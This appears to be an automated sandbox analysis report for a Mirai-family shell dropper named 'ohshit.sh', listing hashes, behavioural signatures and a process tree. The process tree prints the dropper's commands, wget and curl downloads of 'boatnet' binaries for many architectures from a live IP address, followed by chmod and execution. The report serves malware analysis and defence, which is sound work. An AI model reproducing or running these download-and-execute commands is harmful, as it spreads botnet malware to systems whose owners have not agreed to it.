Analysis
-
max time kernel
148s -
max time network
152s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
17-12-2024 11:20
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
d7aac5b39f096043750096172ee9a84f
-
SHA1
fde809f81c26db59c148255c0b60176c8971bc0c
-
SHA256
2c95ce1c6140c8c2db66382fbc0b832367891d03789b31bfef60f1e34b9250a5
-
SHA512
77c79dcb7c89e16cfe5d3712adf37173249b6066673ff20c2a2b6c90ebe2eb5ac5c295a250b6b9fc0596ff0872ecc15d4dec8852a515c0826436426dd5f1efff
Malware Config
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1547 chmod 1495 chmod 1503 chmod 1523 chmod 1539 chmod 1581 chmod 1647 chmod 1655 chmod 1663 chmod 1531 chmod 1563 chmod 1671 chmod 1601 chmod 1609 chmod 1629 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/WTF 1496 WTF /tmp/WTF 1504 WTF /tmp/WTF 1524 WTF /tmp/WTF 1532 WTF /tmp/WTF 1540 WTF /tmp/WTF 1548 WTF /tmp/WTF 1564 WTF /tmp/WTF 1582 WTF /tmp/WTF 1602 WTF /tmp/WTF 1612 WTF /tmp/WTF 1630 WTF /tmp/WTF 1648 WTF /tmp/WTF 1656 WTF /tmp/WTF 1664 WTF /tmp/WTF 1672 WTF -
Modifies Watchdog functionality 1 TTPs 30 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 30 IoCs
description ioc Process File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF -
resource yara_rule behavioral1/files/fstream-1.dat upx -
description ioc Process File opened for reading /proc/1161/cmdline WTF File opened for reading /proc/1255/cmdline WTF File opened for reading /proc/1118/cmdline WTF File opened for reading /proc/1183/cmdline WTF File opened for reading /proc/514/cmdline WTF File opened for reading /proc/1136/cmdline WTF File opened for reading /proc/436/cmdline WTF File opened for reading /proc/1155/cmdline WTF File opened for reading /proc/538/cmdline WTF File opened for reading /proc/419/cmdline WTF File opened for reading /proc/1651/cmdline WTF File opened for reading /proc/1298/cmdline WTF File opened for reading /proc/442/cmdline WTF File opened for reading /proc/699/cmdline WTF File opened for reading /proc/1086/cmdline WTF File opened for reading /proc/1157/cmdline WTF File opened for reading /proc/1169/cmdline WTF File opened for reading /proc/1586/cmdline WTF File opened for reading /proc/507/cmdline WTF File opened for reading /proc/1541/cmdline WTF File opened for reading /proc/1073/cmdline WTF File opened for reading /proc/412/cmdline WTF File opened for reading /proc/1172/cmdline WTF File opened for reading /proc/1275/cmdline WTF File opened for reading /proc/1482/cmdline WTF File opened for reading /proc/1474/cmdline WTF File opened for reading /proc/870/cmdline WTF File opened for reading /proc/1527/cmdline WTF File opened for reading /proc/538/cmdline WTF File opened for reading /proc/699/cmdline WTF File opened for reading /proc/1161/cmdline WTF File opened for reading /proc/436/cmdline WTF File opened for reading /proc/1077/cmdline WTF File opened for reading /proc/1221/cmdline WTF File opened for reading /proc/1174/cmdline WTF File opened for reading /proc/1541/cmdline WTF File opened for reading /proc/559/cmdline WTF File opened for reading /proc/1161/cmdline WTF File opened for reading /proc/1154/cmdline WTF File opened for reading /proc/405/cmdline WTF File opened for reading /proc/1221/cmdline WTF File opened for reading /proc/1649/cmdline WTF File opened for reading /proc/1477/cmdline WTF File opened for reading /proc/1122/cmdline WTF File opened for reading /proc/1275/cmdline WTF File opened for reading /proc/457/cmdline WTF File opened for reading /proc/1665/cmdline WTF File opened for reading /proc/1161/cmdline WTF File opened for reading /proc/1331/cmdline WTF File opened for reading /proc/1283/cmdline WTF File opened for reading /proc/1309/cmdline WTF File opened for reading /proc/1151/cmdline WTF File opened for reading /proc/1157/cmdline WTF File opened for reading /proc/1535/cmdline WTF File opened for reading /proc/536/cmdline WTF File opened for reading /proc/668/cmdline WTF File opened for reading /proc/1667/cmdline WTF File opened for reading /proc/1651/cmdline WTF File opened for reading /proc/559/cmdline WTF File opened for reading /proc/1675/cmdline WTF File opened for reading /proc/1066/cmdline WTF File opened for reading /proc/507/cmdline WTF File opened for reading /proc/424/cmdline WTF File opened for reading /proc/1589/cmdline WTF -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1501 curl 1500 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.mpsl wget File opened for modification /tmp/boatnet.arm6 curl File opened for modification /tmp/boatnet.m68k wget File opened for modification /tmp/boatnet.mips wget File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.arc wget File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.arm wget File opened for modification /tmp/boatnet.arm5 curl File opened for modification /tmp/boatnet.arm7 wget File opened for modification /tmp/boatnet.ppc wget File opened for modification /tmp/boatnet.ppc curl File opened for modification /tmp/boatnet.sh4 wget File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/boatnet.spc wget File opened for modification /tmp/boatnet.spc curl File opened for modification /tmp/boatnet.m68k curl File opened for modification /tmp/boatnet.i468 curl File opened for modification /tmp/boatnet.mpsl curl File opened for modification /tmp/boatnet.sh4 curl File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/boatnet.arm curl File opened for modification /tmp/boatnet.arm5 wget File opened for modification /tmp/boatnet.arm6 wget File opened for modification /tmp/boatnet.arm7 curl File opened for modification /tmp/boatnet.x86_64 curl
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:1480 -
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:1481
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:1485
-
-
/bin/catcat boatnet.x862⤵PID:1494
-
-
/bin/chmodchmod +x boatnet.x86 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-6FGrAt WTF2⤵
- File and Directory Permissions Modification
PID:1495
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1496
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1500
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1501
-
-
/bin/chmodchmod +x boatnet.mips boatnet.x86 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-6FGrAt WTF2⤵
- File and Directory Permissions Modification
PID:1503
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1504
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:1508
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:1515
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-qqwK9a systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-6FGrAt WTF2⤵
- File and Directory Permissions Modification
PID:1523
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1524
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.i4682⤵PID:1528
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.i4682⤵
- Writes file to tmp directory
PID:1529
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-qqwK9a systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-6FGrAt WTF2⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1532
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.i6862⤵PID:1536
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.i6862⤵
- Writes file to tmp directory
PID:1537
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-qqwK9a systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-6FGrAt WTF2⤵
- File and Directory Permissions Modification
PID:1539
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1540
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.x86_642⤵PID:1544
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.x86_642⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-qqwK9a systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-6FGrAt WTF2⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1548
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:1552
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:1559
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-6FGrAt WTF2⤵
- File and Directory Permissions Modification
PID:1563
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1564
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:1568
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:1573
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-kbA3PR systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-6FGrAt WTF2⤵
- File and Directory Permissions Modification
PID:1581
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1582
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:1586
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:1595
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-UqZmTu systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-6FGrAt WTF2⤵
- File and Directory Permissions Modification
PID:1601
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1602
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:1606
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:1607
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-UqZmTu systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-6FGrAt WTF2⤵
- File and Directory Permissions Modification
PID:1609
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1612
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:1616
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:1627
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-KWHRsC systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-6FGrAt WTF2⤵
- File and Directory Permissions Modification
PID:1629
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1630
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:1634
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:1641
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 WTF2⤵
- File and Directory Permissions Modification
PID:1647
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1648
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:1652
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:1653
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 WTF2⤵
- File and Directory Permissions Modification
PID:1655
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1656
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:1660
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:1661
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 WTF2⤵
- File and Directory Permissions Modification
PID:1663
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1664
-
-
/usr/bin/wgetwget http://147.45.124.54/hiddenbin/boatnet.sh42⤵
- Writes file to tmp directory
PID:1668
-
-
/usr/bin/curlcurl -O http://147.45.124.54/hiddenbin/boatnet.sh42⤵
- Writes file to tmp directory
PID:1669
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 config-err-YaDWEb netplan_00jvjmdy ohshit.sh snap-private-tmp ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 WTF2⤵
- File and Directory Permissions Modification
PID:1671
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1672
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD59acf9fc63b01f4a7a5b33881073ff6a6
SHA1cf5be79ccc477ca582c8aee42898442f8089b886
SHA2560a21cbd563070ce0b39665b70de81e88f4680648335e9c6cd13963e8846e7ea9
SHA5121dd2bd462850bdd10a2d95214d16dd358131838862a119b47ba6d70a0c894284efbf7294e24c79b0032aba41e09b8e84c372bdae073d6339e269187b8794eae5